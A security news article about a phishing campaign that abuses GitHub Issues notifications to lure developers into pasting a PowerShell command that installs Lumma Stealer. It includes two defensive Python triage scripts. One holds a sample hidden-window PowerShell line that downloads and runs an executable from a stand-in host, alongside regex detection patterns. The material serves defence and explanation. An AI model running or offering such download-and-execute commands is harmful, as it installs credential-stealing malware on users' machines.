Clever ‘GitHub Scanner’ Campaign Abusing Repositories to Distribute Lumma Stealer Malware

A new and sophisticated phishing campaign is leveraging GitHub repositories to distribute the Lumma Stealer, a password-stealing malware. By exploiting GitHub’s Issues feature, attackers are tricking developers and contributors into visiting a counterfeit website, leading them to install malware on their Windows machines. This campaign is particularly dangerous as it targets users who frequent open source project repositories or are subscribed to email notifications from these projects.

Phishing Technique: Exploiting GitHub ‘Issues’ for Malware Distribution

In this campaign, malicious actors create a new "issue" on an open source repository, falsely claiming that the project contains a security vulnerability. The issue urges users to visit a domain called "github-scanner[.]com" to investigate and resolve the alleged problem. However, this domain is not affiliated with GitHub and is designed to trick users into downloading malware.

What makes this phishing campaign especially convincing is that GitHub automatically sends email notifications when new issues are created. These email alerts, which come from GitHub's own legitimate notification address, warn users about the "security vulnerability" and instruct them to visit the fake website. The issues are signed as though they come from the "GitHub Security Team," further increasing their credibility.

Bogus Security Alerts and Malicious Redirects

Once users click on the link in the email, they are directed to the fake GitHub Scanner website. Upon arrival, they are presented with a deceptive captcha asking them to "verify you are human." Behind the scenes, however, JavaScript on the page silently copies a malicious command to the user’s clipboard.

The next screen then prompts users to execute the copied code by opening the Windows Run dialog (Win+R) and pasting the clipboard contents. The copied text includes a PowerShell command that downloads a malicious Windows executable from the fake domain, saves it as SysSetup.exe, and executes it.
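The paste-into-Run step described above leaves a forensic trace: Windows Explorer records every command typed into the Win+R dialog under the RunMRU registry key of the user's hive. The following triage script is an added example for defenders and is not code from the original article or from any vendor; it parses a constructed RunMRU export (the sample command and domain are made up and do not reproduce the campaign's real one-liner) and flags entries that combine a script host with download, execution or window-hiding indicators, which is the pattern this lure produces. On a live Windows host the optional `load_runmru_from_registry` helper reads the real key.

```python
import re
import sys
from dataclasses import dataclass, field

# Indicators, each a separate signal so a finding explains itself.
LAUNCHER = re.compile(r"\b(powershell|pwsh|mshta|cmd|wscript|cscript)\b", re.I)
DOWNLOAD = re.compile(
    r"(iwr|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|"
    r"net\.webclient|\bcurl\b|\bwget\b|https?://)", re.I)
EXECUTE = re.compile(
    r"(\biex\b|invoke-expression|start-process|\.exe\b|-enc(odedcommand)?\b)", re.I)
HIDING = re.compile(
    r"(-w(indowstyle)?\s+hidden|-e(xecution)?p(olicy)?\s+bypass|-nop\b|-noni\b)", re.I)

# Constructed sample of HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU.
# Explorer stores each Win+R entry as a string ending in "\1"; "MRUList" orders the
# slots most-recent-first. The domain and command here are invented for the example.
SAMPLE_RUNMRU = {
    "MRUList": "cab",
    "a": "notepad\\1",
    "b": "cmd\\1",
    "c": 'powershell -w hidden -c "iwr https://github-scanner.invalid/l.txt '
         '-OutFile $env:TEMP\\SysSetup.exe; Start-Process $env:TEMP\\SysSetup.exe"\\1',
}


@dataclass
class Finding:
    slot: str
    command: str
    reasons: list = field(default_factory=list)


def runmru_entries(values):
    """Yield (slot, command) most-recent-first, stripping Explorer's trailing '\\1'."""
    for slot in values.get("MRUList", ""):
        raw = values.get(slot)
        if raw is None:
            continue
        yield slot, raw[:-2] if raw.endswith("\\1") else raw


def triage_runmru(values):
    """Return Findings for Run-box entries that look like paste-and-run lures."""
    findings = []
    for slot, cmd in runmru_entries(values):
        reasons = []
        if LAUNCHER.search(cmd):
            reasons.append("script host/launcher")
        if DOWNLOAD.search(cmd):
            reasons.append("remote download")
        if EXECUTE.search(cmd):
            reasons.append("execution of fetched content")
        if HIDING.search(cmd):
            reasons.append("window hiding / policy bypass")
        # Someone typing "cmd" or "powershell" alone is normal; a launcher combined
        # with any other signal from the Run box is the paste-and-run pattern.
        if "script host/launcher" in reasons and len(reasons) >= 2:
            findings.append(Finding(slot, cmd, reasons))
    return findings


def load_runmru_from_registry():
    """Read the current user's RunMRU on Windows; returns {} elsewhere."""
    if sys.platform != "win32":
        return {}
    import winreg  # standard library on Windows
    path = r"Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"
    values = {}
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, path) as key:
        _, value_count, _ = winreg.QueryInfoKey(key)
        for i in range(value_count):
            name, data, _ = winreg.EnumValue(key, i)
            values[name] = str(data)
    return values


if __name__ == "__main__":
    source = load_runmru_from_registry() or SAMPLE_RUNMRU
    for f in triage_runmru(source):
        print(f"[{f.slot}] {f.command}\n    reasons: {', '.join(f.reasons)}")
```

The same indicators translate directly into an EDR or Sysmon rule: a PowerShell process whose parent is explorer.exe, launched with hidden-window or bypass flags and an outbound download, is the process-level equivalent of what this script finds in the registry after the fact.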

Technical Breakdown of the Malware

The malware, identified as Lumma Stealer, is a trojan designed to steal sensitive information such as:

  • Passwords and credentials stored in web browsers.
  • Authentication cookies, which could allow attackers to access online accounts without passwords.
  • Browsing history and other sensitive data from installed browsers.
  • Cryptocurrency wallets or files containing private keys.

The Lumma Stealer malware also has anti-detection capabilities and can establish persistence on the infected machine, allowing it to remain active even after reboots. It attempts to contact several suspicious domains, although most of these domains were down at the time of writing.

The Danger of GitHub ‘Issues’ Feature Abuse

The success of this campaign hinges on the attackers’ abuse of GitHub’s Issues feature. Threat actors create fake GitHub accounts and submit new issues to open source repositories, falsely claiming that security vulnerabilities exist. This action triggers legitimate email notifications from GitHub’s servers, making the phishing attempt appear authentic. Developers and contributors to these repositories, as well as any users subscribed to receive notifications, are then lured into visiting the fake GitHub Scanner domain.

By exploiting GitHub’s notification system, the attackers increase the reach and effectiveness of their campaign. BleepingComputer reported that similar tactics were used in recent campaigns, where attackers responded to GitHub Issues with fake solutions, again leading victims to malware installations.

Potential Consequences: Supply Chain Attacks and Credential Theft

This campaign is likely part of a broader effort to steal developer credentials and compromise open source projects. With access to developers’ GitHub accounts, attackers could modify the source code of popular projects, inserting malicious code that affects anyone using those projects. This could result in supply chain attacks, where malicious code is introduced into software used by millions of people or businesses.

Supply chain attacks are particularly concerning in the open source community because many organizations rely on open source libraries and tools in their applications. A compromise at the source code level could have devastating downstream effects, impacting users across the globe.

How Developers and Users Can Protect Themselves

To defend against this phishing campaign and similar attacks, GitHub users are advised to follow these best practices:

  1. Avoid Clicking on Suspicious Links: Be wary of links in email notifications, even if they come from legitimate addresses like GitHub’s. Double-check the domain before visiting it.
  2. Report Suspicious GitHub Issues: If you encounter a suspicious issue claiming to report a security vulnerability, report it to GitHub for investigation.
  3. Verify Security Alerts: Always cross-reference any alleged security vulnerabilities with the project’s official maintainers or security advisories.
  4. Implement Strong Security Measures: Use multi-factor authentication (MFA) for your GitHub account to prevent unauthorized access, even if credentials are compromised.
  5. Monitor for Malware: Use antivirus and endpoint detection tools to detect malware, such as Lumma Stealer, that may have been inadvertently installed on your system.
  6. Stay Updated: Ensure that all development environments, including browsers and operating systems, are regularly updated to mitigate vulnerabilities that malware may exploit.
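The first and third recommendations above (check the domain, cross-reference the alert) can be partly automated for anyone who triages notification mail or bot-filed issues. The script below is an added example, not code from the article or from GitHub: it extracts every URL from an issue body or notification text, classifies each host as first-party GitHub, a GitHub lookalike, or external, and raises a verdict when an alleged security alert points anywhere but GitHub. The allowlist of GitHub hosts and the sample issue text are assumptions constructed for the example; the lure domain is a stand-in for the one named in the article.

```python
import re
from urllib.parse import urlparse

# Hosts GitHub itself links to from notifications. Assumed allowlist for the example;
# add your GitHub Enterprise hostname here. github.io is deliberately absent because
# it serves user-controlled Pages content.
GITHUB_HOSTS = {
    "github.com", "gist.github.com", "docs.github.com",
    "github.blog", "githubusercontent.com",
}
URL_RE = re.compile(r"https?://[^\s<>\"')\]]+", re.I)
SECURITY_LURE = re.compile(r"security\s+(vulnerability|issue|alert|scan)", re.I)

# Constructed sample of a lure issue body, modelled on the campaign's wording.
SAMPLE_ISSUE = """Security Vulnerability Reported
We found a critical security vulnerability in this repository.
Please visit https://github-scanner.example/ to scan and fix it.
Reference: https://github.com/example-org/example-repo/security/advisories
Signed, GitHub Security Team"""


def classify_url(url):
    """'github' for first-party hosts, 'lookalike' for brand-abusing hosts, else 'external'."""
    host = (urlparse(url).hostname or "").lower()
    if host in GITHUB_HOSTS or any(host.endswith("." + h) for h in GITHUB_HOSTS):
        return "github"
    if "github" in host.replace("-", "").replace("_", ""):
        return "lookalike"
    return "external"


def extract_urls(text):
    """Pull URLs out of free text, dropping trailing sentence punctuation."""
    return [u.rstrip(".,;:!?") for u in URL_RE.findall(text)]


def triage_issue(body):
    """Return (verdict, buckets). verdict is 'suspicious' or 'ok'."""
    buckets = {"github": [], "lookalike": [], "external": []}
    for url in extract_urls(body):
        buckets[classify_url(url)].append(url)
    claims_security = bool(SECURITY_LURE.search(body))
    # A lookalike host is suspicious on its own; an external host is suspicious
    # only when the text also claims to be a security finding. Genuine advisories
    # live on github.com, so that combination is the lure pattern.
    suspicious = bool(buckets["lookalike"]) or (claims_security and bool(buckets["external"]))
    return ("suspicious" if suspicious else "ok"), buckets


if __name__ == "__main__":
    verdict, buckets = triage_issue(SAMPLE_ISSUE)
    print("verdict:", verdict)
    for kind, urls in buckets.items():
        for u in urls:
            print(f"  {kind:9} {u}")
```

Run against a mailbox export or the body returned by the GitHub Issues API, this turns the "double-check the domain" advice into a filter: anything flagged suspicious is routed to a maintainer for verification against the project's own security advisories rather than acted on from the notification.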

The Rising Threat of Platform Abuse

The GitHub Scanner campaign demonstrates how even trusted platforms like GitHub can be abused by threat actors to distribute malware. By leveraging GitHub’s Issues feature and sending notifications through legitimate servers, attackers can easily lure developers and contributors into visiting malicious sites. These campaigns are likely aimed at credential theft and supply chain attacks, where the goal is to compromise open source projects and the developers behind them.

Organizations and developers must remain vigilant, taking proactive steps to secure their GitHub accounts and avoid falling victim to such attacks.

Copyright CommandLink. All rights reserved.